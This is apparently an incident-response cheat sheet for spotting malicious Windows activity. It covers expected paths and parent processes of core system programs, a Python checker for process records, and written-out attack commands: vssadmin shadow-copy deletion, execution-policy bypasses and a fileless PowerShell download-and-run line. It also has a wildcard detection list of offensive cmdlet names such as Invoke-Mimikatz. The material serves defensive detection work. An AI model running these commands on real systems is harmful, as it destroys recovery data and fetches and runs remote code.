09.08.2020 13:35

Malicious commands for incident response

What is practically always suspicious / malicious:

See also: day-2-for508-2.html


cmd.exe outside of C:\windows\system32 or c:\windows

*.exe, *.com, *.vbs, *.bat, *.dll called from "world writable" directories such as:

\tmp, \temp\, \Users\*, C:\Users\YourUserName\Roaming, C:\Users\YourUserName\Local, C:\Users\YourUserName\LocalLow

Calls to fake system programs sitting in the wrong place. The correct locations are listed below. If you see a call from any other directory:

  • Have a RAM and HDD snapshot created.
  • Contact the responsible person (or the caller) and verify that the action is legitimate.
  • If necessary, isolate the called program and detonate it in the sandbox.
  • If necessary, check the IOCs from the sandbox in MISP and TheHive.
  • If necessary, have the machine isolated / disconnected from the network.
  • If necessary, initiate a forensic analysis.

The above also applies in the reverse case: when these programs are written to or modified outside of an update.

  • Image Path: N/A for system.exe – Not generated from an executable image
  • Parent Process: None
  • Number of Instances: One


  • Image Path: %SystemRoot%\System32\smss.exe
  • Parent Process: System
  • Number of Instances: One master instance and another child instance per session. Children exit after creating their session


  • Image Path: %SystemRoot%\System32\wininit.exe
  • Parent Process: Created by an instance of smss.exe that exits, so tools usually do not provide the parent process name.
  • Number of Instances: One


  • Image Path: %SystemRoot%\System32\RuntimeBroker.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\taskhostw.exe
  • Parent Process: svchost.exe
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\winlogon.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more


  • Image Path: %SystemRoot%\System32\csrss.exe
  • Parent Process: Created by an instance of smss.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: Two or more


  • Image Path: %SystemRoot%\System32\services.exe
  • Parent Process: wininit.exe
  • Number of Instances: One


  • Image Path: %SystemRoot%\system32\svchost.exe
  • Parent Process: services.exe (most often)
  • Number of Instances: Many (generally at least 10)


  • Image Path: %SystemRoot%\System32\lsaiso.exe
  • Parent Process: wininit.exe
  • Number of Instances: Zero or one


  • Image Path: %SystemRoot%\System32\lsass.exe
  • Parent Process: wininit.exe
  • Number of Instances: One


  • Image Path: %SystemRoot%\explorer.exe
  • Parent Process: Created by an instance of userinit.exe that exits, so analysis tools usually do not provide the parent process name.
  • Number of Instances: One or more per interactively logged-on user
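To turn the location and parent expectations above into a check, here is an added Python example (not from the original page) that scores constructed process-creation records, for example Sysmon event 1 Image / ParentImage pairs. It assumes %SystemRoot% is C:\Windows and that the parent field carries the parent's image path or name.

```python
import re

# Added example, not from the original page: check process-creation records
# (e.g. Sysmon event 1 Image / ParentImage) against the expected locations and
# parents listed above. Assumes %SystemRoot% is C:\Windows.
SYS32 = "c:\\windows\\system32\\"
CORE = {  # name -> (allowed full paths, expected parent name or None if not visible)
    "smss.exe":          ({SYS32 + "smss.exe"}, "system"),
    "wininit.exe":       ({SYS32 + "wininit.exe"}, None),
    "runtimebroker.exe": ({SYS32 + "runtimebroker.exe"}, "svchost.exe"),
    "taskhostw.exe":     ({SYS32 + "taskhostw.exe"}, "svchost.exe"),
    "winlogon.exe":      ({SYS32 + "winlogon.exe"}, None),
    "csrss.exe":         ({SYS32 + "csrss.exe"}, None),
    "services.exe":      ({SYS32 + "services.exe"}, "wininit.exe"),
    "svchost.exe":       ({SYS32 + "svchost.exe"}, "services.exe"),  # "most often": a lead, not proof
    "lsaiso.exe":        ({SYS32 + "lsaiso.exe"}, "wininit.exe"),
    "lsass.exe":         ({SYS32 + "lsass.exe"}, "wininit.exe"),
    "explorer.exe":      ({r"c:\windows\explorer.exe"}, None),
    "cmd.exe":           ({SYS32 + "cmd.exe", r"c:\windows\cmd.exe"}, None),
}
WRITABLE_DIR = re.compile(r"\\(tmp|temp|users)\\")  # \tmp, \temp\, \Users\* from the page
EXEC_EXT = (".exe", ".com", ".vbs", ".bat", ".dll")

def check_process(image, parent_image):
    """Return the findings for one record; an empty list means nothing odd."""
    name = image.lower().rsplit("\\", 1)[-1]
    parent = parent_image.lower().rsplit("\\", 1)[-1] if parent_image else None
    findings = []
    if name in CORE:
        allowed, expected_parent = CORE[name]
        if image.lower() not in allowed:  # core name, wrong location
            findings.append(f"{name} running from unexpected location: {image}")
        if expected_parent and parent != expected_parent:  # core name, wrong parent
            findings.append(f"{name} spawned by {parent or 'unknown'}, expected {expected_parent}")
    elif name.endswith(EXEC_EXT) and WRITABLE_DIR.search(image.lower()):
        findings.append(f"executable launched from world-writable directory: {image}")
    return findings

# Constructed sample records (not real telemetry): (Image, ParentImage)
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\services.exe"),
    (r"C:\Users\alice\AppData\Local\Temp\svchost.exe", r"C:\Windows\explorer.exe"),
    (r"C:\Windows\System32\lsass.exe", r"C:\Windows\System32\winlogon.exe"),
    (r"C:\Users\alice\AppData\Roaming\update.vbs", r"C:\Windows\System32\cmd.exe"),
]

def scan(events):
    """Map each suspicious image to its findings; clean records are left out."""
    results = {img: check_process(img, par) for img, par in events}
    return {img: f for img, f in results.items() if f}
```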


Destroying evidence and recovery options: deleting all Volume Shadow Copies

"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet


PowerShell

Bypassing PowerShell's internal security controls (the execution policy) by starting powershell.exe with the script to run passed as a parameter:

powershell.exe -NonInteractive -WindowStyle Hidden -ExecutionPolicy bypass -File "C:\windows\system32\evil.ps1"


Executing files other than .ps1 files:

powershell.exe -ep Bypass "& {Get-Content .\malware.ps2 | iex}"


Executing directly in memory (fileless attack):

powershell.exe -ep Bypass -nop -noexit -c iex ((New-Object Net.WebClient).DownloadString('https://[website]/malware.ps1'))


Detecting cmdlet names from well-known PowerShell exploitation frameworks:

- "*Invoke-DllInjection*"
- "*Invoke-Shellcode*"
- "*Invoke-WmiCommand*"
- "*Get-GPPPassword*"
- "*Get-Keystrokes*"
- "*Get-TimedScreenshot*"
- "*Get-VaultCredential*"
- "*Invoke-CredentialInjection*"
- "*Invoke-Mimikatz*"
- "*Invoke-NinjaCopy*"
- "*Invoke-TokenManipulation*"
- "*Out-Minidump*"
- "*VolumeShadowCopyTools*"
- "*Invoke-ReflectivePEInjection*"
- "*Invoke-UserHunter*"
- "*Find-GPOLocation*"
- "*Invoke-ACLScanner*"
- "*Invoke-DowngradeAccount*"
- "*Get-ServiceUnquoted*"
- "*Get-ServiceFilePermission*"
- "*Get-ServicePermission*"
- "*Invoke-ServiceAbuse*"
- "*Install-ServiceBinary*"
- "*Get-RegAutoLogon*"
- "*Get-VulnAutoRun*"
- "*Get-VulnSchTask*"
- "*Get-UnattendedInstallFile*"
- "*Get-ApplicationHost*"
- "*Get-RegAlwaysInstallElevated*"
- "*Get-Unconstrained*"
- "*Add-RegBackdoor*"
- "*Add-ScrnSaveBackdoor*"
- "*Gupt-Backdoor*"
- "*Invoke-ADSBackdoor*"
- "*Enabled-DuplicateToken*"
- "*Invoke-PsUaCme*"
- "*Remove-Update*"
- "*Check-VM*"
- "*Get-LSASecret*"
- "*Get-PassHashes*"
- "*Show-TargetScreen*"
- "*Port-Scan*"
- "*Invoke-PoshRatHttp*"
- "*Invoke-PowerShellTCP*"
- "*Invoke-PowerShellWMI*"
- "*Add-Exfiltration*"
- "*Add-Persistence*"
- "*Do-Exfiltration*"
- "*Start-CaptureServer*"
- "*Get-ChromeDump*"
- "*Get-ClipboardContents*"
- "*Get-FoxDump*"
- "*Get-IndexedItem*"
- "*Get-Screenshot*"
- "*Invoke-Inveigh*"
- "*Invoke-NetRipper*"
- "*Invoke-EgressCheck*"
- "*Invoke-PostExfil*"
- "*Invoke-PSInject*"
- "*Invoke-RunAs*"
- "*MailRaider*"
- "*New-HoneyHash*"
- "*Set-MacAttribute*"
- "*Invoke-DCSync*"
- "*Invoke-PowerDump*"
- "*Exploit-Jboss*"
- "*Invoke-ThunderStruck*"
- "*Invoke-VoiceTroll*"
- "*Set-Wallpaper*"
- "*Invoke-InveighRelay*"
- "*Invoke-PsExec*"
- "*Invoke-SSHCommand*"
- "*Get-SecurityPackages*"
- "*Install-SSP*"
- "*Invoke-BackdoorLNK*"
- "*PowerBreach*"
- "*Get-SiteListPassword*"
- "*Get-System*"
- "*Invoke-BypassUAC*"
- "*Invoke-Tater*"
- "*Invoke-WScriptBypassUAC*"
- "*PowerUp*"
- "*PowerView*"
- "*Get-RickAstley*"
- "*Find-Fruit*"
- "*HTTP-Login*"
- "*Find-TrustedDocuments*"
- "*Invoke-Paranoia*"
- "*Invoke-WinEnum*"
- "*Invoke-ARPScan*"
- "*Invoke-PortScan*"
- "*Invoke-ReverseDNSLookup*"
- "*Invoke-SMBScanner*"
- "*Invoke-Mimikittenz*"
- "*Invoke-AllChecks*"
False positives: Get-SystemDriveInfo (legitimate name that the wildcard *Get-System* also matches; see http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1)